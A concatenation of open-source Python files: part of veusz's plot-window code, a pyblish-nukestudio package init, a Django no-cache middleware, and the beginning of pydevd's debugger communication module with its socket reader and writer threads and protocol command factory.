self.pixmapitem.unsetCursor()
#self.label.setCursor(qt4.Qt.CrossCursor)
elif self.clickmode == 'pick':
self.pixmapitem.setCursor(qt4.Qt.CrossCursor)
self.sigPickerEnabled.emit(True)
    def getClick(self):
        """Wait for the user to click on the plot and return axis values.

        Blocks (spinning the Qt event loop) until the click handler
        resets ``self.clickmode``, then maps the clicked pixel onto each
        axis of the Graph widget under the cursor.

        Returns a list of (axis path, axis coordinate) tuples, or []
        when the click did not land inside a Graph widget.
        """
        # wait for click from user
        qt4.QApplication.setOverrideCursor(qt4.QCursor(qt4.Qt.CrossCursor))
        oldmode = self.clickmode
        self.clickmode = 'viewgetclick'
        while self.clickmode == 'viewgetclick':
            # process events until the mouse handler changes clickmode back
            qt4.qApp.processEvents()
        self.clickmode = oldmode
        qt4.QApplication.restoreOverrideCursor()
        # take clicked point and convert to coords of scrollview
        # (self.grabpos is presumably set by the mouse handler - it is not
        # visible in this part of the file)
        pt = self.grabpos
        # try to work out in which widget the first point is in
        widget = self.painthelper.pointInWidgetBounds(
            pt.x(), pt.y(), widgets.Graph)
        if widget is None:
            return []
        # convert points on plotter to points on axis for each axis
        xpts = N.array( [pt.x()] )
        ypts = N.array( [pt.y()] )
        axesretn = []
        # iterate over children, to look for plotters
        for c in [i for i in widget.children if
                  isinstance(i, widgets.GenericPlotter)]:
            # get axes associated with plotter
            axes = c.parent.getAxes( (c.settings.xAxis,
                                      c.settings.yAxis) )
            # iterate over each, and update the ranges
            for axis in [a for a in axes if a is not None]:
                s = axis.settings
                # choose the x or y pixel coordinate depending on axis direction
                if s.direction == 'horizontal':
                    p = xpts
                else:
                    p = ypts
                # convert point on plotter to axis coordinate
                # FIXME: Need To Trap Conversion Errors!
                r = axis.plotterToGraphCoords(
                    self.painthelper.widgetBounds(axis), p)
                axesretn.append( (axis.path, r[0]) )
        return axesretn
def selectedWidgets(self, widgets):
"""Update control items on screen associated with widget.
Called when widgets have been selected in the tree edit window
"""
self.updateControlGraphs(widgets)
self.lastwidgetsselected = widgets
def updateControlGraphs(self, widgets):
"""Add control graphs for the widgets given."""
# delete old items from root
for c in list(self.controlgraphroot.childItems()):
self.scene.removeItem(c)
# add each item to the root
if self.painthelper:
for widget in widgets:
cgis = self.painthelper.getControlGraph(widget)
if cgis:
for control in cgis:
control.createGraphicsItem(self.controlgraphroot)
class FullScreenPlotWindow(qt4.QScrollArea):
    """Borderless full-screen viewer wrapping a PlotWindow."""
    def __init__(self, document, pagenumber):
        qt4.QScrollArea.__init__(self)
        self.setFrameShape(qt4.QFrame.NoFrame)
        self.setWidgetResizable(True)
        # embedded plot window showing the requested page
        self.document = document
        plotwin = self.plotwin = PlotWindow(document, None)
        plotwin.isfullscreen = True
        plotwin.pagenumber = pagenumber
        self.setWidget(plotwin)
        plotwin.setFocus()
        self.showFullScreen()
        # minimal toolbar: a close button plus the zoom/page actions
        tb = self.toolbar = qt4.QToolBar(_("Full screen toolbar"), self)
        tb.addAction(utils.getIcon("kde-window-close"), _("Close"),
                     self.close)
        actions = ('view.zoom11', 'view.zoomin', 'view.zoomout',
                   'view.zoomwidth', 'view.zoomheight',
                   'view.zoompage', 'view.prevpage', 'view.nextpage')
        for name in actions:
            tb.addAction(plotwin.vzactions[name])
        tb.show()
    def resizeEvent(self, event):
        """Refit the page to the new screen size."""
        qt4.QScrollArea.resizeEvent(self, event)
        pw = self.plotwin
        pagesize = self.document.pageSize(pw.pagenumber, dpi=pw.dpi)
        avail = pw.size()
        # scale so the whole page is visible in both directions
        pw.zoomfactor = min(avail.width() / pagesize[0],
                            avail.height() / pagesize[1])
        pw.checkPlotUpdate()
    def keyPressEvent(self, event):
        """Escape leaves full-screen mode; everything else is passed on."""
        if event.key() == qt4.Qt.Key_Escape:
            event.accept()
            self.close()
        else:
            qt4.QScrollArea.keyPressEvent(self, event)
| mythsmith/veusz | veusz/windows/plotwindow.py | Python | gpl-2.0 | 47,229 |
from .version import *
from .lib import (
show,
setup,
register_plugins,
add_to_filemenu,
)
| pyblish/pyblish-nukestudio | pyblish_nukestudio/__init__.py | Python | lgpl-3.0 | 108 |
class NoCache(object):
    """Django middleware disabling client-side caching of static files.

    Sets ``Cache-Control: must-revalidate, no-cache`` on every response
    whose request path is under ``/static/`` so browsers revalidate
    static assets (useful during development).
    """

    def process_response(self, request, response):
        """Add the no-cache header to static-file responses.

        Debug ``print`` statements that ran on every request (and used
        Python-2-only syntax) were removed.
        """
        if request.path.startswith('/static/'):
            response['Cache-Control'] = 'must-revalidate, no-cache'
        return response
| moteloquito/final-project | final/middleware/nocache.py | Python | gpl-3.0 | 442 |
''' pydevd - a debugging daemon
This is the daemon you launch for python remote debugging.
Protocol:
each command has a format:
id\tsequence-num\ttext
id: protocol command number
sequence-num: each request has a sequence number. Sequence numbers
originating at the debugger are odd, sequence numbers originating
at the daemon are even. Every response uses the same sequence number
as the request.
payload: it is protocol dependent. When response is a complex structure, it
is returned as XML. Each attribute value is urlencoded, and then the whole
payload is urlencoded again to prevent stray characters corrupting protocol/xml encodings
Commands:
NUMBER NAME FROM* ARGUMENTS RESPONSE NOTE
100 series: program execution
101 RUN JAVA - -
102 LIST_THREADS JAVA RETURN with XML listing of all threads
103 THREAD_CREATE PYDB - XML with thread information
104 THREAD_KILL JAVA id (or * to exit) kills the thread
                         PYDB      id                          notifies JAVA that thread was killed
105 THREAD_SUSPEND JAVA XML of the stack, suspends the thread
reason for suspension
PYDB id notifies JAVA that thread was suspended
106 CMD_THREAD_RUN JAVA id resume the thread
PYDB id \t reason notifies JAVA that thread was resumed
107 STEP_INTO JAVA thread_id
108 STEP_OVER JAVA thread_id
109 STEP_RETURN JAVA thread_id
110 GET_VARIABLE JAVA thread_id \t frame_id \t GET_VARIABLE with XML of var content
FRAME|GLOBAL \t attributes*
111 SET_BREAK JAVA file/line of the breakpoint
112 REMOVE_BREAK JAVA file/line of the return
113 CMD_EVALUATE_EXPRESSION JAVA expression result of evaluating the expression
114 CMD_GET_FRAME JAVA request for frame contents
115 CMD_EXEC_EXPRESSION JAVA
116 CMD_WRITE_TO_CONSOLE PYDB
117 CMD_CHANGE_VARIABLE
118 CMD_RUN_TO_LINE
119 CMD_RELOAD_CODE
120 CMD_GET_COMPLETIONS JAVA
500 series diagnostics/ok
501 VERSION either Version string (1.0) Currently just used at startup
502 RETURN either Depends on caller -
900 series: errors
901 ERROR either - This is reserved for unexpected errors.
* JAVA - remote debugger, the java end
* PYDB - pydevd, the python end
'''
import os
from _pydev_bundle.pydev_imports import _queue
from _pydev_imps._pydev_saved_modules import time
from _pydev_imps._pydev_saved_modules import thread
from _pydev_imps._pydev_saved_modules import threading
from _pydev_imps._pydev_saved_modules import socket
from socket import socket, AF_INET, SOCK_STREAM, SHUT_RD, SHUT_WR, SOL_SOCKET, SO_REUSEADDR, SHUT_RDWR, timeout
from _pydevd_bundle.pydevd_constants import DebugInfoHolder, dict_contains, get_thread_id, IS_JYTHON, IS_PY2, IS_PY3K, IS_PY36_OR_GREATER, \
STATE_RUN
try:
from urllib import quote_plus, unquote, unquote_plus
except:
from urllib.parse import quote_plus, unquote, unquote_plus #@Reimport @UnresolvedImport
import pydevconsole
from _pydevd_bundle import pydevd_vars
from _pydevd_bundle import pydevd_xml
from _pydevd_bundle import pydevd_tracing
from _pydevd_bundle import pydevd_vm_type
from pydevd_file_utils import get_abs_path_real_path_and_base_from_frame, NORM_PATHS_AND_BASE_CONTAINER, norm_file_to_client
import sys
import traceback
from _pydevd_bundle.pydevd_utils import quote_smart as quote, compare_object_attrs, cmp_to_key, to_string
from _pydev_bundle import pydev_log
from _pydev_bundle import _pydev_completer
from _pydevd_bundle.pydevd_tracing import get_exception_traceback_str
from _pydevd_bundle import pydevd_console
from _pydev_bundle.pydev_monkey import disable_trace_thread_modules, enable_trace_thread_modules
# --- wire-protocol command ids (see the module docstring for the format) ---
# 100 series: program execution / debugger requests
CMD_RUN = 101
CMD_LIST_THREADS = 102
CMD_THREAD_CREATE = 103
CMD_THREAD_KILL = 104
CMD_THREAD_SUSPEND = 105
CMD_THREAD_RUN = 106
CMD_STEP_INTO = 107
CMD_STEP_OVER = 108
CMD_STEP_RETURN = 109
CMD_GET_VARIABLE = 110
CMD_SET_BREAK = 111
CMD_REMOVE_BREAK = 112
CMD_EVALUATE_EXPRESSION = 113
CMD_GET_FRAME = 114
CMD_EXEC_EXPRESSION = 115
CMD_WRITE_TO_CONSOLE = 116
CMD_CHANGE_VARIABLE = 117
CMD_RUN_TO_LINE = 118
CMD_RELOAD_CODE = 119
CMD_GET_COMPLETIONS = 120
# Note: renumbered (conflicted on merge)
CMD_CONSOLE_EXEC = 121
CMD_ADD_EXCEPTION_BREAK = 122
CMD_REMOVE_EXCEPTION_BREAK = 123
CMD_LOAD_SOURCE = 124
CMD_ADD_DJANGO_EXCEPTION_BREAK = 125
CMD_REMOVE_DJANGO_EXCEPTION_BREAK = 126
CMD_SET_NEXT_STATEMENT = 127
CMD_SMART_STEP_INTO = 128
CMD_EXIT = 129
CMD_SIGNATURE_CALL_TRACE = 130
CMD_SET_PY_EXCEPTION = 131
CMD_GET_FILE_CONTENTS = 132
CMD_SET_PROPERTY_TRACE = 133
# Pydev debug console commands
CMD_EVALUATE_CONSOLE_EXPRESSION = 134
CMD_RUN_CUSTOM_OPERATION = 135
CMD_GET_BREAKPOINT_EXCEPTION = 136
CMD_STEP_CAUGHT_EXCEPTION = 137
CMD_SEND_CURR_EXCEPTION_TRACE = 138
CMD_SEND_CURR_EXCEPTION_TRACE_PROCEEDED = 139
CMD_IGNORE_THROWN_EXCEPTION_AT = 140
CMD_ENABLE_DONT_TRACE = 141
CMD_SHOW_CONSOLE = 142
CMD_GET_ARRAY = 143
CMD_STEP_INTO_MY_CODE = 144
CMD_GET_CONCURRENCY_EVENT = 145
CMD_SHOW_RETURN_VALUES = 146
CMD_INPUT_REQUESTED = 147
CMD_GET_DESCRIPTION = 148
CMD_PROCESS_CREATED = 149
CMD_SHOW_CYTHON_WARNING = 150
# 500 series: diagnostics / ok
CMD_VERSION = 501
CMD_RETURN = 502
# 900 series: errors
CMD_ERROR = 901
# Reverse map used for logging only: command id (as a string) -> constant
# name. Keep in sync with the CMD_* constants above.
ID_TO_MEANING = {
    '101': 'CMD_RUN',
    '102': 'CMD_LIST_THREADS',
    '103': 'CMD_THREAD_CREATE',
    '104': 'CMD_THREAD_KILL',
    '105': 'CMD_THREAD_SUSPEND',
    '106': 'CMD_THREAD_RUN',
    '107': 'CMD_STEP_INTO',
    '108': 'CMD_STEP_OVER',
    '109': 'CMD_STEP_RETURN',
    '110': 'CMD_GET_VARIABLE',
    '111': 'CMD_SET_BREAK',
    '112': 'CMD_REMOVE_BREAK',
    '113': 'CMD_EVALUATE_EXPRESSION',
    '114': 'CMD_GET_FRAME',
    '115': 'CMD_EXEC_EXPRESSION',
    '116': 'CMD_WRITE_TO_CONSOLE',
    '117': 'CMD_CHANGE_VARIABLE',
    '118': 'CMD_RUN_TO_LINE',
    '119': 'CMD_RELOAD_CODE',
    '120': 'CMD_GET_COMPLETIONS',
    '121': 'CMD_CONSOLE_EXEC',
    '122': 'CMD_ADD_EXCEPTION_BREAK',
    '123': 'CMD_REMOVE_EXCEPTION_BREAK',
    '124': 'CMD_LOAD_SOURCE',
    '125': 'CMD_ADD_DJANGO_EXCEPTION_BREAK',
    '126': 'CMD_REMOVE_DJANGO_EXCEPTION_BREAK',
    '127': 'CMD_SET_NEXT_STATEMENT',
    '128': 'CMD_SMART_STEP_INTO',
    '129': 'CMD_EXIT',
    '130': 'CMD_SIGNATURE_CALL_TRACE',
    '131': 'CMD_SET_PY_EXCEPTION',
    '132': 'CMD_GET_FILE_CONTENTS',
    '133': 'CMD_SET_PROPERTY_TRACE',
    '134': 'CMD_EVALUATE_CONSOLE_EXPRESSION',
    '135': 'CMD_RUN_CUSTOM_OPERATION',
    '136': 'CMD_GET_BREAKPOINT_EXCEPTION',
    '137': 'CMD_STEP_CAUGHT_EXCEPTION',
    '138': 'CMD_SEND_CURR_EXCEPTION_TRACE',
    '139': 'CMD_SEND_CURR_EXCEPTION_TRACE_PROCEEDED',
    '140': 'CMD_IGNORE_THROWN_EXCEPTION_AT',
    '141': 'CMD_ENABLE_DONT_TRACE',
    '142': 'CMD_SHOW_CONSOLE',
    '143': 'CMD_GET_ARRAY',
    '144': 'CMD_STEP_INTO_MY_CODE',
    '145': 'CMD_GET_CONCURRENCY_EVENT',
    '146': 'CMD_SHOW_RETURN_VALUES',
    '147': 'CMD_INPUT_REQUESTED',
    '148': 'CMD_GET_DESCRIPTION',
    '149': 'CMD_PROCESS_CREATED',
    '150': 'CMD_SHOW_CYTHON_WARNING',
    '501': 'CMD_VERSION',
    '502': 'CMD_RETURN',
    '901': 'CMD_ERROR',
    }
MAX_IO_MSG_SIZE = 1000 #if the io is too big, we'll not send all (could make the debugger too non-responsive)
#this number can be changed if there's need to do so
VERSION_STRING = "@@BUILD_NUMBER@@"
from _pydev_bundle._pydev_filesystem_encoding import getfilesystemencoding
# encoding used to decode byte-string file names before sending them over
# the wire (relevant on Python 2)
file_system_encoding = getfilesystemencoding()
#--------------------------------------------------------------------------------------------------- UTILITIES
#=======================================================================================================================
# pydevd_log
#=======================================================================================================================
def pydevd_log(level, *args):
    """Write a trace message to stderr if `level` is enabled.

    levels are:
        0 most serious warnings/errors
        1 warnings/significant events
        2 informational trace
    """
    if level > DebugInfoHolder.DEBUG_TRACE_LEVEL:
        return
    # stderr may already be closed when the program's console has
    # finished; writing then raises, which we deliberately ignore
    try:
        sys.stderr.write('%s\n' % (args,))
    except:
        pass
#=======================================================================================================================
# GlobalDebuggerHolder
#=======================================================================================================================
class GlobalDebuggerHolder:
    '''
    Holder for the global debugger.
    '''
    # The single PyDB instance, or None before set_global_debugger() is called.
    global_dbg = None # Note: don't rename (the name is used in our attach to process)
#=======================================================================================================================
# get_global_debugger
#=======================================================================================================================
def get_global_debugger():
    """Return the currently registered global debugger (or None)."""
    return GlobalDebuggerHolder.global_dbg

GetGlobalDebugger = get_global_debugger # Backward-compatibility
#=======================================================================================================================
# set_global_debugger
#=======================================================================================================================
def set_global_debugger(dbg):
    """Register `dbg` as the single global debugger instance."""
    GlobalDebuggerHolder.global_dbg = dbg
#------------------------------------------------------------------- ACTUAL COMM
#=======================================================================================================================
# PyDBDaemonThread
#=======================================================================================================================
class PyDBDaemonThread(threading.Thread):
    """Base class for the debugger's own daemon threads.

    Live daemon threads are tracked in `created_pydb_daemon_threads`
    (a dict used as a set) while their run() is active, and they opt
    out of the debugger's own tracing via `pydev_do_not_trace`.
    """
    created_pydb_daemon_threads = {}
    def __init__(self):
        threading.Thread.__init__(self)
        self.setDaemon(True)
        # set by do_kill_pydev_thread() to ask the main loop to exit
        self.killReceived = False
        # checked in _stop_trace(): daemon threads should not be traced
        self.pydev_do_not_trace = True
        self.is_pydev_daemon_thread = True
    def run(self):
        """Register the thread, prepare Jython state if needed, then run _on_run()."""
        created_pydb_daemon = self.created_pydb_daemon_threads
        created_pydb_daemon[self] = 1
        try:
            try:
                if IS_JYTHON and not isinstance(threading.currentThread(), threading._MainThread):
                    # we shouldn't update sys.modules for the main thread, cause it leads to the second importing 'threading'
                    # module, and the new instance of main thread is created
                    import org.python.core as PyCore #@UnresolvedImport
                    ss = PyCore.PySystemState()
                    # Note: Py.setSystemState() affects only the current thread.
                    PyCore.Py.setSystemState(ss)
                self._on_run()
            except:
                # sys/traceback may be None during interpreter shutdown
                if sys is not None and traceback is not None:
                    traceback.print_exc()
        finally:
            del created_pydb_daemon[self]
    def _on_run(self):
        """Subclass hook: the thread's actual main loop."""
        raise NotImplementedError('Should be reimplemented by: %s' % self.__class__)
    def do_kill_pydev_thread(self):
        #that was not working very well because jython gave some socket errors
        self.killReceived = True
    def _stop_trace(self):
        """Disable tracing for this thread (except on old Jython, see below)."""
        if self.pydev_do_not_trace:
            disable_tracing = True
            if pydevd_vm_type.get_vm_type() == pydevd_vm_type.PydevdVmType.JYTHON and sys.hexversion <= 0x020201f0:
                # don't run untraced threads if we're in jython 2.2.1 or lower
                # jython bug: if we start a thread and another thread changes the tracing facility
                # it affects other threads (it's not set only for the thread but globally)
                # Bug: http://sourceforge.net/tracker/index.php?func=detail&aid=1870039&group_id=12867&atid=112867
                disable_tracing = False
            if disable_tracing:
                pydevd_tracing.SetTrace(None) # no debugging on this thread
#=======================================================================================================================
# ReaderThread
#=======================================================================================================================
class ReaderThread(PyDBDaemonThread):
    """ reader thread reads and dispatches commands in an infinite loop """
    def __init__(self, sock):
        PyDBDaemonThread.__init__(self)
        self.sock = sock
        self.setName("pydevd.Reader")
        # imported lazily to avoid a circular import at module load time
        from _pydevd_bundle.pydevd_process_net_command import process_net_command
        self.process_net_command = process_net_command
        self.global_debugger_holder = GlobalDebuggerHolder
    def do_kill_pydev_thread(self):
        """Request the reader loop to stop and unblock the pending recv()."""
        #We must close the socket so that it doesn't stay halted there.
        self.killReceived = True
        try:
            self.sock.shutdown(SHUT_RD) #shutdown the socket for read
        except:
            #just ignore that
            pass
    def _on_run(self):
        """Main loop: read '\\n'-terminated commands and dispatch each one."""
        self._stop_trace()
        read_buffer = ""
        try:
            while not self.killReceived:
                try:
                    r = self.sock.recv(1024)
                except:
                    # recv failing after a deliberate kill is expected;
                    # otherwise report it and finish the session
                    if not self.killReceived:
                        traceback.print_exc()
                        self.handle_except()
                    return #Finished communication.
                #Note: the java backend is always expected to pass utf-8 encoded strings. We now work with unicode
                #internally and thus, we may need to convert to the actual encoding where needed (i.e.: filenames
                #on python 2 may need to be converted to the filesystem encoding).
                if hasattr(r, 'decode'):
                    r = r.decode('utf-8')
                read_buffer += r
                if DebugInfoHolder.DEBUG_RECORD_SOCKET_READS:
                    sys.stderr.write('debugger: received >>%s<<\n' % (read_buffer,))
                    sys.stderr.flush()
                # an empty read means the peer closed the connection
                if len(read_buffer) == 0:
                    self.handle_except()
                    break
                # dispatch every complete (newline-terminated) command
                while read_buffer.find('\n') != -1:
                    command, read_buffer = read_buffer.split('\n', 1)
                    # wire format: id \t sequence \t payload
                    args = command.split('\t', 2)
                    try:
                        cmd_id = int(args[0])
                        pydev_log.debug('Received command: %s %s\n' % (ID_TO_MEANING.get(str(cmd_id), '???'), command,))
                        self.process_command(cmd_id, int(args[1]), args[2])
                    except:
                        traceback.print_exc()
                        sys.stderr.write("Can't process net command: %s\n" % command)
                        sys.stderr.flush()
        except:
            traceback.print_exc()
            self.handle_except()
    def handle_except(self):
        """Terminate the debugging session after a communication failure."""
        self.global_debugger_holder.global_dbg.finish_debugging_session()
    def process_command(self, cmd_id, seq, text):
        """Forward one parsed command to the net-command processor."""
        self.process_net_command(self.global_debugger_holder.global_dbg, cmd_id, seq, text)
#----------------------------------------------------------------------------------- SOCKET UTILITIES - WRITER
#=======================================================================================================================
# WriterThread
#=======================================================================================================================
class WriterThread(PyDBDaemonThread):
    """ writer thread writes out the commands in an infinite loop """
    def __init__(self, sock):
        PyDBDaemonThread.__init__(self)
        self.sock = sock
        self.setName("pydevd.Writer")
        self.cmdQueue = _queue.Queue()
        # CPython can busy-poll the queue; other VMs get a small sleep
        if pydevd_vm_type.get_vm_type() == 'python':
            self.timeout = 0
        else:
            self.timeout = 0.1
    def add_command(self, cmd):
        """ cmd is NetCommand """
        if not self.killReceived: #we don't take new data after everybody die
            self.cmdQueue.put(cmd)
    def _on_run(self):
        """ just loop and write responses """
        self._stop_trace()
        get_has_timeout = sys.hexversion >= 0x02030000 # 2.3 onwards have it.
        try:
            while True:
                try:
                    try:
                        if get_has_timeout:
                            # block up to 0.1s for the next command
                            cmd = self.cmdQueue.get(1, 0.1)
                        else:
                            # pre-2.3: emulate the timeout with a short sleep
                            time.sleep(.01)
                            cmd = self.cmdQueue.get(0)
                    except _queue.Empty:
                        if self.killReceived:
                            # drained the queue after a kill: close and exit
                            try:
                                self.sock.shutdown(SHUT_WR)
                                self.sock.close()
                            except:
                                pass
                            return #break if queue is empty and killReceived
                        else:
                            continue
                except:
                    #pydevd_log(0, 'Finishing debug communication...(1)')
                    #when liberating the thread here, we could have errors because we were shutting down
                    #but the thread was still not liberated
                    return
                out = cmd.outgoing
                if DebugInfoHolder.DEBUG_TRACE_LEVEL >= 1:
                    out_message = 'sending cmd --> '
                    out_message += "%20s" % ID_TO_MEANING.get(out[:3], 'UNKNOWN')
                    out_message += ' '
                    out_message += unquote(unquote(out)).replace('\n', ' ')
                    try:
                        sys.stderr.write('%s\n' % (out_message,))
                    except:
                        pass
                if IS_PY3K:
                    out = bytearray(out, 'utf-8')
                self.sock.send(out) #TODO: this does not guarantee that all message are sent (and jython does not have a send all)
                if cmd.id == CMD_EXIT:
                    break
                # modules may be torn down during interpreter shutdown
                if time is None:
                    break #interpreter shutdown
                time.sleep(self.timeout)
        except Exception:
            GlobalDebuggerHolder.global_dbg.finish_debugging_session()
            if DebugInfoHolder.DEBUG_TRACE_LEVEL >= 0:
                traceback.print_exc()
    def empty(self):
        """Return True if there are no queued commands left to send."""
        return self.cmdQueue.empty()
#--------------------------------------------------- CREATING THE SOCKET THREADS
#=======================================================================================================================
# start_server
#=======================================================================================================================
def start_server(port):
    """Bind to `port` and block until the remote debugger connects.

    Returns the connected socket; exits the process on failure.
    """
    server = socket(AF_INET, SOCK_STREAM)
    server.settimeout(None)
    # SO_REUSEPORT is not available on every platform; fall back to
    # SO_REUSEADDR when the constant cannot be imported
    try:
        from socket import SO_REUSEPORT
    except ImportError:
        server.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
    else:
        server.setsockopt(SOL_SOCKET, SO_REUSEPORT, 1)
    server.bind(('', port))
    pydevd_log(1, "Bound to port ", str(port))
    try:
        server.listen(1)
        conn, _addr = server.accept()
        pydevd_log(1, "Connection accepted")
        # closing server socket is not necessary but we don't need it
        server.shutdown(SHUT_RDWR)
        server.close()
        return conn
    except:
        sys.stderr.write("Could not bind to port: %s\n" % (port,))
        sys.stderr.flush()
        traceback.print_exc()
        sys.exit(1) #TODO: is it safe?
#=======================================================================================================================
# start_client
#=======================================================================================================================
def start_client(host, port):
    """Connect to host:port, retrying up to 100 times before giving up.

    Returns the connected socket; exits the process when all attempts fail.
    """
    pydevd_log(1, "Connecting to ", host, ":", str(port))
    sock = socket(AF_INET, SOCK_STREAM)
    for _attempt in range(100):
        try:
            sock.connect((host, port))
        except:
            # server may not be accepting yet; back off briefly and retry
            time.sleep(0.2)
        else:
            pydevd_log(1, "Connected.")
            return sock
    sys.stderr.write("Could not connect to %s: %s\n" % (host, port))
    sys.stderr.flush()
    traceback.print_exc()
    sys.exit(1) #TODO: is it safe?
#------------------------------------------------------------------------------------ MANY COMMUNICATION STUFF
#=======================================================================================================================
# NetCommand
#=======================================================================================================================
class NetCommand:
    """ Commands received/sent over the network.
    Command can represent command received from the debugger,
    or one to be sent by daemon.
    """
    next_seq = 0 # sequence numbers; daemon-originated ones are even
    def __init__(self, id, seq, text):
        """ smart handling of parameters
        if sequence is 0, new sequence will be generated
        if text has carriage returns they'll be replaced"""
        self.id = id
        if seq == 0:
            # allocate the next daemon-originated (even) sequence number
            NetCommand.next_seq += 2
            seq = NetCommand.next_seq
        self.seq = seq
        self.text = text
        # url-quote the payload, keeping characters the protocol allows raw
        encoded = quote(to_string(text), '/<>_=" \t')
        # wire format: id \t sequence \t payload \n
        self.outgoing = '%s\t%s\t%s\n' % (id, seq, encoded)
#=======================================================================================================================
# NetCommandFactory
#=======================================================================================================================
class NetCommandFactory:
def _thread_to_xml(self, thread):
""" thread information as XML """
name = pydevd_xml.make_valid_xml_value(thread.getName())
cmdText = '<thread name="%s" id="%s" />' % (quote(name), get_thread_id(thread))
return cmdText
def make_error_message(self, seq, text):
cmd = NetCommand(CMD_ERROR, seq, text)
if DebugInfoHolder.DEBUG_TRACE_LEVEL > 2:
sys.stderr.write("Error: %s" % (text,))
return cmd
def make_thread_created_message(self, thread):
cmdText = "<xml>" + self._thread_to_xml(thread) + "</xml>"
return NetCommand(CMD_THREAD_CREATE, 0, cmdText)
def make_process_created_message(self):
cmdText = '<process/>'
return NetCommand(CMD_PROCESS_CREATED, 0, cmdText)
def make_show_cython_warning_message(self):
try:
return NetCommand(CMD_SHOW_CYTHON_WARNING, 0, '')
except:
return self.make_error_message(0, get_exception_traceback_str())
def make_custom_frame_created_message(self, frameId, frameDescription):
frameDescription = pydevd_xml.make_valid_xml_value(frameDescription)
cmdText = '<xml><thread name="%s" id="%s"/></xml>' % (frameDescription, frameId)
return NetCommand(CMD_THREAD_CREATE, 0, cmdText)
def make_list_threads_message(self, seq):
""" returns thread listing as XML """
try:
t = threading.enumerate()
cmd_text = ["<xml>"]
append = cmd_text.append
for i in t:
if t.isAlive():
append(self._thread_to_xml(i))
append("</xml>")
return NetCommand(CMD_RETURN, seq, ''.join(cmd_text))
except:
return self.make_error_message(seq, get_exception_traceback_str())
def make_variable_changed_message(self, seq, payload):
# notify debugger that value was changed successfully
return NetCommand(CMD_RETURN, seq, payload)
def make_io_message(self, v, ctx, dbg=None):
'''
@param v: the message to pass to the debug server
@param ctx: 1 for stdio 2 for stderr
@param dbg: If not none, add to the writer
'''
try:
if len(v) > MAX_IO_MSG_SIZE:
v = v[0:MAX_IO_MSG_SIZE]
v += '...'
v = pydevd_xml.make_valid_xml_value(quote(v, '/>_= \t'))
net = NetCommand(str(CMD_WRITE_TO_CONSOLE), 0, '<xml><io s="%s" ctx="%s"/></xml>' % (v, ctx))
except:
net = self.make_error_message(0, get_exception_traceback_str())
if dbg:
dbg.writer.add_command(net)
return net
def make_version_message(self, seq):
try:
return NetCommand(CMD_VERSION, seq, VERSION_STRING)
except:
return self.make_error_message(seq, get_exception_traceback_str())
def make_thread_killed_message(self, id):
try:
return NetCommand(CMD_THREAD_KILL, 0, str(id))
except:
return self.make_error_message(0, get_exception_traceback_str())
def make_thread_suspend_str(self, thread_id, frame, stop_reason, message, suspend_type="trace"):
""" <xml>
<thread id="id" stop_reason="reason">
<frame id="id" name="functionName " file="file" line="line">
<var variable stuffff....
</frame>
</thread>
"""
cmd_text_list = ["<xml>"]
append = cmd_text_list.append
make_valid_xml_value = pydevd_xml.make_valid_xml_value
if message:
message = make_valid_xml_value(message)
append('<thread id="%s" stop_reason="%s" message="%s" suspend_type="%s">' % (thread_id, stop_reason, message, suspend_type))
curr_frame = frame
try:
while curr_frame:
#print cmdText
my_id = id(curr_frame)
#print "id is ", my_id
if curr_frame.f_code is None:
break #Iron Python sometimes does not have it!
my_name = curr_frame.f_code.co_name #method name (if in method) or ? if global
if my_name is None:
break #Iron Python sometimes does not have it!
#print "name is ", my_name
abs_path_real_path_and_base = get_abs_path_real_path_and_base_from_frame(curr_frame)
myFile = norm_file_to_client(abs_path_real_path_and_base[0])
if file_system_encoding.lower() != "utf-8" and hasattr(myFile, "decode"):
# myFile is a byte string encoded using the file system encoding
# convert it to utf8
myFile = myFile.decode(file_system_encoding).encode("utf-8")
#print "file is ", myFile
#myFile = inspect.getsourcefile(curr_frame) or inspect.getfile(frame)
myLine = str(curr_frame.f_lineno)
#print "line is ", myLine
#the variables are all gotten 'on-demand'
#variables = pydevd_xml.frame_vars_to_xml(curr_frame.f_locals)
variables = ''
append('<frame id="%s" name="%s" ' % (my_id , make_valid_xml_value(my_name)))
append('file="%s" line="%s">' % (quote(myFile, '/>_= \t'), myLine))
append(variables)
append("</frame>")
curr_frame = curr_frame.f_back
except :
traceback.print_exc()
append("</thread></xml>")
return ''.join(cmd_text_list)
def make_thread_suspend_message(self, thread_id, frame, stop_reason, message, suspend_type):
try:
return NetCommand(CMD_THREAD_SUSPEND, 0, self.make_thread_suspend_str(thread_id, frame, stop_reason, message, suspend_type))
except:
return self.make_error_message(0, get_exception_traceback_str())
def make_thread_run_message(self, id, reason):
try:
return NetCommand(CMD_THREAD_RUN, 0, str(id) + "\t" + str(reason))
except:
return self.make_error_message(0, get_exception_traceback_str())
def make_get_variable_message(self, seq, payload):
try:
return NetCommand(CMD_GET_VARIABLE, seq, payload)
except Exception:
return self.make_error_message(seq, get_exception_traceback_str())
def make_get_array_message(self, seq, payload):
try:
return NetCommand(CMD_GET_ARRAY, seq, payload)
except Exception:
return self.make_error_message(seq, get_exception_traceback_str())
def make_get_description_message(self, seq, payload):
try:
return NetCommand(CMD_GET_DESCRIPTION, seq, payload)
except Exception:
return self.make_error_message(seq, get_exception_traceback_str())
def make_get_frame_message(self, seq, payload):
try:
return NetCommand(CMD_GET_FRAME, seq, payload)
except Exception:
return self.make_error_message(seq, get_exception_traceback_str())
def make_evaluate_expression_message(self, seq, payload):
try:
return NetCommand(CMD_EVALUATE_EXPRESSION, seq, payload)
except Exception:
return self.make_error_message(seq, get_exception_traceback_str())
def make_get_completions_message(self, seq, payload):
try:
return NetCommand(CMD_GET_COMPLETIONS, seq, payload)
except Exception:
return self.make_error_message(seq, get_exception_traceback_str())
def make_get_file_contents(self, seq, payload):
try:
return NetCommand(CMD_GET_FILE_CONTENTS, seq, payload)
except Exception:
return self.make_error_message(seq, get_exception_traceback_str())
def make_send_breakpoint_exception_message(self, seq, payload):
try:
return NetCommand(CMD_GET_BREAKPOINT_EXCEPTION, seq, payload)
except Exception:
return self.make_error_message(seq, get_exception_traceback_str())
def make_send_curr_exception_trace_message(self, seq, thread_id, curr_frame_id, exc_type, exc_desc, trace_obj):
try:
while trace_obj.tb_next is not None:
trace_obj = trace_obj.tb_next
exc_type = pydevd_xml.make_valid_xml_value(str(exc_type)).replace('\t', ' ') or 'exception: type unknown'
exc_desc = pydevd_xml.make_valid_xml_value(str(exc_desc)).replace('\t', ' ') or 'exception: no description'
